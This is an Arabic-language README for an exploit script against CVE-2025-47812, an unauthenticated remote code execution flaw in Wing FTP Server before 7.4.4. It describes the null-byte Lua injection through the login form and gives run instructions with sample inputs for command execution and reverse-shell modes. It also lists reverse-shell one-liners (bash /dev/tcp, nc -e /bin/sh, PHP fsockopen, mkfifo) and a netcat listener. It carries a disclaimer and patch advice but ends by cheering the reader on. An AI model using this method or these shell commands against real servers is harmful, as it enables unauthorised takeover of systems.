
CVE-2025-47812 - ثغرة تنفيذ التعليمات البرمجية عن بعد (RCE) في خادم Wing FTP Server
===========================================================
المؤلف: blindma1den
التاريخ: يوليو 2025
نوع الاستغلال: تنفيذ التعليمات البرمجية عن بعد (بدون مصادقة)
الهدف: خادم Wing FTP Server الإصدار < 7.4.4
درجة CVSS: 10.0 (حرجة)
يستغل هذا السكريبت ثغرة CVE-2025-47812، وهي ثغرة خطيرة في واجهة الويب لخادم Wing FTP Server تسمح للمهاجمين عن بُعد بتنفيذ أوامر نظام عشوائية أو فتح شل عكسي بدون مصادقة.
سبب الثغرة هو التعامل غير السليم مع البايتات الفارغة (%00) في نموذج تسجيل الدخول (/loginok.html). وهذا يسمح بحقن كود Lua
في ملفات الجلسة، والتي يتم تقييمها لاحقًا عند الوصول إلى نقاط النهاية مثل /dir.html.
وصف NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
whoami، uname -a)تثبيت التبعيات:
pip install requests
شغّل السكريبت:
python3 wingftp_rce_exploit.py
سيُطلب منك إدخال:
[1] تشغيل أمر:
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 1
Command to execute (default: whoami): whoami
[2] الشل العكسي:
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 2
Reverse shell IP address: 192.168.1.100
Reverse shell port: 4444
شغّل المستمع الخاص بك قبل تشغيل الشل:
nc -lvnp 4444
Bash: bash -i >& /dev/tcp/IP/PORT 0>&1
Python3: python3 -c 'import socket,subprocess,os; ...'
Netcat: nc IP PORT -e /bin/sh
PHP: php -r '$sock=fsockopen("IP",PORT); ...'
FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...
هذا الكود لأغراض تعليمية فقط. لا تستخدم هذا الاستغلال ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. الاستخدام غير المصرح به غير قانوني وغير أخلاقي.
قم بتحديث أنظمتك فورًا. الإصدار 7.4.4 من Wing FTP Server يعالج هذه الثغرة.
استمتع بالاختراق!